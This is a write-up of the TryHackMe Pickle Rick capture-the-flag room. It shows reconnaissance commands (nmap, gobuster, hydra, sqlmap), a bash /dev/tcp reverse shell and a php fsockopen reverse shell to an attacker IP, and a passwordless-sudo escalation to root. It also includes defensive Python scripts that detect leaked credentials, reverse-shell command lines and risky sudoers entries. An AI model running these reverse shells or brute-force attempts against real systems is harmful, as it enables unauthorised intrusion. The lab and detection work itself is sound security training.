TryHackMe — Pickle Rick

The Pickle Rick room is part of TryHackMe’s beginner course. It’s a machine where you will use the knowledge you gained from the OWASP Top 10 and OWASP Juice Shop. It exploits the carelessness of developers and system administrators. It’s a relatively easy machine, yet full of fun. Let’s begin.

Let’s begin by scanning our target with an nmap port scan.

nmap -p- 10.10.144.58 -vv -oA nmap/portScanPickleRick

After we get our desired ports, we can run another nmap scan, this time a version scan.

nmap -sV -sC -p 22,80 10.10.144.58 -vv -oA nmap/versionScanPickleRick

So, we only have 2 ports open: port 22 for ssh and port 80 for http. Take note of the versions of the services we scanned.

Port 22 runs OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

Port 80 runs Apache httpd 2.4.18 ((Ubuntu))

ENUMERATION

Let’s start our enumeration on port 80. We begin by loading the page.

The webpage says something about “BURP”, one of our clues. As discussed in my previous write-ups, my “Burp Community” is up and running every time I visit the http page of my target machines.

Let’s check the web page source to see if it gives us a clue.

As we can see, one of the common mistakes of rookie devs is leaving comments on the web page. Now we have a username: R1ckRul3s. I ran a nikto web app scan and gobuster to discover hidden directories or files, and while doing so, I tried to brute force my way into the ssh login with hydra, using the username we found.

hydra -t 16 -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt -vV 10.10.144.58 ssh

It gives back an error saying that ssh does not support password authentication. To find out why I was getting the error, I tried logging in to ssh manually with a username and password.

Okay, so the reason we are getting that error from hydra is that username and password login is not supported on this ssh server; instead we must use a key (id_rsa) in order to log in. That’s another clue we need to look out for.

The nikto scan didn’t give us much information (or excitement) other than the Apache version we already got from the nmap scan.

nikto -h 10.10.144.58

From there, let’s check gobuster.

gobuster dir -u http://10.10.144.58/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak,config,json

gobuster gave us interesting files and directories.

We have directory listing on /assets/; however, there seems to be no interesting file here.

So, all the 302 responses point to the login.php screen.

Here, it seems that we can bypass login. Let’s check that with sqlmap. First we need to intercept our login request and save it into a file named pickleRickLogin.

Then we run sqlmap.

sqlmap -r pickleRickLogin

After running, sqlmap tells us that the parameters don’t seem to be injectable.

So, from here we can try to brute force our login again using hydra, but before going deeper, let’s check the other files we haven’t touched or checked yet.

Checking the robots.txt from gobuster’s output.

Well, for me that’s odd; it’s not the robots.txt I expected it to be. Looks like we’ve got some password lying around. Since ssh needs a key, let’s try to log in to the web app using the username we got earlier and this password.
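From the defender’s side, both leaks above (the username in an HTML comment and the stray string in robots.txt) can be caught before deployment. The following is an added example, not part of the original write-up: the keyword list, the sample page and the placeholder strings are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Field names used by robots.txt files (RFC 9309 plus common extensions).
ROBOTS_FIELDS = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay", "host"}
# Words in an HTML comment that suggest an account detail was left behind.
SENSITIVE = re.compile(r"\b(user(name)?|pass(word|wd)?|login|secret|token|key)\b", re.I)

class CommentCollector(HTMLParser):
    """Collects the text of every <!-- ... --> comment in a page."""
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(" ".join(data.split()))

def audit_html(html):
    """Return HTML comments that mention account-related keywords."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [c for c in parser.comments if SENSITIVE.search(c)]

def audit_robots(text):
    """Return (line number, text) for lines that are not 'field: value' directives."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop robots.txt comments
        if not line:
            continue
        field, sep, _ = line.partition(":")
        if not sep or field.strip().lower() not in ROBOTS_FIELDS:
            findings.append((lineno, line))
    return findings

# Constructed samples shaped like the two leaks in this write-up.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<!-- layout tweak, remove later -->
<!--
  Reminder for myself
  Username: EXAMPLE_USER
-->
</body></html>"""
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /admin/\nEXAMPLE_LEAKED_STRING\n"

if __name__ == "__main__":
    print(audit_html(SAMPLE_HTML))
    print(audit_robots(SAMPLE_ROBOTS))
```

Run as a pre-deploy step over the built site, any non-empty result from either function is worth a manual look.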

And it worked. We got ourselves a command execution page.

From here we can do a lot of things, but first let me try some basic Linux commands.

id
pwd
ls -la

And there goes our first flag. Let’s try to read it from here.

cat Sup3rS3cretPickl3Ingred.txt

It seems that we can’t read server files from here. Now, let’s try to execute a reverse shell command, with my netcat listener set up on port 53.

First, let’s try a bash reverse shell.

bash -i >& /dev/tcp/10.13.9.90/53 0>&1

It is not working. Let’s take a look at Burp to see what happened.

The response included some kind of base64-format string, so I tried decoding it.

It seems that we are going nowhere here.

Now, let’s try the php reverse shell command that we can find here.

php -r '$sock=fsockopen("10.13.9.90",53);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

And we got a shell. Let’s try to make it a more interactive one.
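On the blue-team side, both reverse shell attempts above leave the same trace: the web server account starting a process whose command line opens a socket or an interactive shell. The following is an added detection sketch, not part of the original write-up: the JSON event format, the account names and the sample events (with a documentation-range address) are assumptions constructed for illustration.

```python
import json
import re

# Accounts a web server usually runs as (assumed names; adjust per host).
WEB_USERS = {"www-data", "apache", "nginx"}
# Command-line patterns matching the two techniques tried in this write-up.
RULES = {
    "bash /dev/tcp redirect": re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "php socket one-liner": re.compile(r"\bphp\b.*\s-r\s.*fsockopen\s*\(", re.S),
    "interactive shell": re.compile(r"(^|[\s/\"'])(ba)?sh\s+-i\b"),
}

def detect(events_jsonl):
    """Return (pid, [rule names]) for suspicious processes run by web accounts."""
    alerts = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["user"] not in WEB_USERS:
            continue  # interactive shells from human accounts are normal
        hits = [name for name, rx in RULES.items() if rx.search(ev["cmdline"])]
        if hits:
            alerts.append((ev["pid"], hits))
    return alerts

# Constructed process-creation events, one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 2101, "user": "www-data", "cmdline": "ls -la"},
    {"pid": 2102, "user": "www-data",
     "cmdline": "bash -c bash -i >& /dev/tcp/192.0.2.10/53 0>&1"},
    {"pid": 2103, "user": "www-data",
     "cmdline": 'php -r $s=fsockopen("192.0.2.10",53);proc_open("/bin/sh -i",[$s,$s,$s],$p);'},
    {"pid": 2104, "user": "alice", "cmdline": "bash -i"},
])

if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```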

And we get the first flag and read the clue.txt.

Let’s check for other users and files in the /home directory.

Okay, we got the second flag here. Let’s check if we can read the file.

Yes, we can.

Let’s now check the /root directory.

Seems that we need to elevate to root. Let’s try to list our sudo privileges.

sudo -l

So, from the results, we can see that we can use sudo without a password. We then sudo switch to root, and after that we can grab our 3rd and final flag from the /root directory (and check the .ssh folder).
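The misconfiguration behind this last step is a sudoers entry that lets an account run every command without a password. The following is an added audit example, not part of the original write-up: it only handles simple one-line user specs (no aliases or line continuations), and the service account names and the sudoers sample are assumptions constructed for illustration.

```python
import re

# Accounts that run network-facing services (assumed names; adjust per host).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}
# One-line user spec: who host = (runas) [TAG:] command[, command...]
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(\([^)]*\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"\b([A-Z_]+)\s*:\s*")

def audit_sudoers(text):
    """Return (line number, account, is_service_account) for NOPASSWD: ALL specs."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "@", "Defaults")) or "_Alias" in line:
            continue  # comments, includes, Defaults and alias definitions
        m = SPEC.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = set(TAG.findall(rest))
        commands = [c.strip() for c in TAG.sub("", rest).split(",")]
        # Only the combination "no password" + "every command" is flagged.
        if "NOPASSWD" in tags and "ALL" in commands:
            who = m.group("who")
            findings.append((lineno, who, who in SERVICE_ACCOUNTS))
    return findings

# Constructed sudoers content; the last line models the finding above.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
www-data ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for lineno, who, is_service in audit_sudoers(SAMPLE_SUDOERS):
        level = "CRITICAL" if is_service else "WARNING"
        print(f"{level}: line {lineno}: {who} has NOPASSWD: ALL")
```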

TAKEAWAYS

I would recommend this room to all people out there who are just starting their infosec journey like me.

It was a relatively easy but very fun box. For me, there are several potential rabbit holes (on ssh, on the login, or on decoding the strings) where, if I were a first timer in CTF, I might have wasted a lot of time (because, admittedly, I wasted a lot of time on those kinds of rabbit holes back then).

Lastly, I think my main takeaway here is to just go with the flow, go with what the server gives you, and enjoy your hacking moments :)

“He-who-must-NOT-be-named”